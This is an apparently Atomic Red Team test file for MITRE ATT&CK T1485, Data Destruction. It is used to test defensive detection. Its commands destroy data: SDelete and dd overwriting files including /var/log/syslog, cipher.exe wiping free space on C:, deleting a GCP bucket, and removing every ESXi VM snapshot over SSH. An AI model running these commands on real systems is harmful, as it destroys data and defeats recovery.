attack_technique: T1485 display_name: Data Destruction atomic_tests: - name: Windows - Overwrite file with SysInternals SDelete auto_generated_guid: 476419b5-aebf-4366-a131-ae3e8dae5fc2 description: | Overwrites and deletes a file using SysInternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in the powershell session along with other information about the file that was deleted. supported_platforms: - windows input_arguments: sdelete_exe: description: Path of sdelete executable type: path default: PathToAtomicsFolder\..\ExternalPayloads\Sdelete\sdelete.exe file_to_delete: description: Path of file to delete type: path default: PathToAtomicsFolder\..\ExternalPayloads\T1485.txt dependency_executor_name: powershell dependencies: - description: | Secure delete tool from SysInternals must exist on disk at specified location (#{sdelete_exe}) prereq_command: | if (Test-Path "#{sdelete_exe}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SDelete.zip" Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\SDelete.zip" "PathToAtomicsFolder\..\ExternalPayloads\Sdelete" -Force Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\SDelete.zip" -Force executor: command: | if (-not (Test-Path "#{file_to_delete}")) { New-Item "#{file_to_delete}" -Force } & "#{sdelete_exe}" -accepteula "#{file_to_delete}" name: powershell - name: FreeBSD/macOS/Linux - Overwrite file with DD auto_generated_guid: 38deee99-fd65-4031-bec8-bfa4f9f26146 description: | Overwrites and deletes a file using DD. To stop the test, break the command with CTRL/CMD+C. supported_platforms: - linux - macos input_arguments: overwrite_source: description: Path of data source to overwrite with type: path default: /dev/zero file_to_overwrite: description: Path of file to overwrite and remove type: path default: /var/log/syslog executor: command: | dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk '{print $5}') iflag=count_bytes name: sh - name: Overwrite deleted data on C drive auto_generated_guid: 321fd25e-0007-417f-adec-33232252be19 description: | RansomEXX malware removes all deleted files using windows built-in cipher.exe to prevent forensic recover. This process is very slow and test execution may timeout. https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware https://support.microsoft.com/en-us/topic/cipher-exe-security-tool-for-the-encrypting-file-system-56c85edd-85cf-ac07-f2f7-ca2d35dab7e4 supported_platforms: - windows executor: command: | cipher.exe /w:C: name: command_prompt - name: GCP - Delete Bucket auto_generated_guid: 4ac71389-40f4-448a-b73f-754346b3f928 description: | This Atomic will create a Google Storage Bucket then delete it. The idea for this Atomic came from a Rule published by the Elastic team. Identifies when a Google Cloud Platform (GCP) storage bucket is deleted. An adversary may delete a storage bucket in order to disrupt their target's business operations. This atomic will create a bucket then delete the bucket. Reference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/impact_gcp_storage_bucket_deleted.toml supported_platforms: - iaas:gcp input_arguments: project_id: description: ID of the GCP Project you to execute the command against. type: string default: atomic-test-1 bucket_name: description: The name of the bucket to delete. type: string default: atomic-red-team-bucket executor: name: sh elevation_required: false command: | gcloud config set project #{project_id} gcloud storage buckets delete gs://#{bucket_name} cleanup_command: | cd "$PathToAtomicsFolder/T1485/src/T1485-4/" terraform state rm google_storage_bucket.bucket terraform destroy -auto-approve dependency_executor_name: sh dependencies: - description: | Requires gcloud prereq_command: | if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; get_prereq_command: | echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" - description: | Check if user is logged in prereq_command: | gcloud config get-value account get_prereq_command: | gcloud auth login --no-launch-browser - description: | Check if terraform is installed. prereq_command: | terraform version get_prereq_command: | echo Please install the terraform. - description: | Create dependency resources using terraform prereq_command: | stat "$PathToAtomicsFolder/T1485/src/T1485-4/terraform.tfstate" get_prereq_command: | cd "$PathToAtomicsFolder/T1485/src/T1485-4/" terraform init terraform apply -auto-approve - name: ESXi - Delete VM Snapshots auto_generated_guid: 1207ddff-f25b-41b3-aa0e-7c26d2b546d1 description: | Deletes all snapshots for all Virtual Machines on an ESXi Host [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#inhibit%20recovery) supported_platforms: - windows input_arguments: vm_host: description: Specify the host name or IP of the ESXi server. type: string default: atomic.local vm_user: description: Specify the privilege user account on the ESXi server. type: string default: root vm_pass: description: Specify the privileged user's password. type: string default: password plink_file: description: Path to Plink type: path default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe' dependency_executor_name: powershell dependencies: - description: | Check if we have plink prereq_command: | if (Test-Path "#{plink_file}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" executor: command: | echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "for i in `vim-cmd vmsvc/getallvms | awk 'NR>1 {print $1}'`; do vim-cmd vmsvc/snapshot.removeall $i & done" name: command_prompt elevation_required: false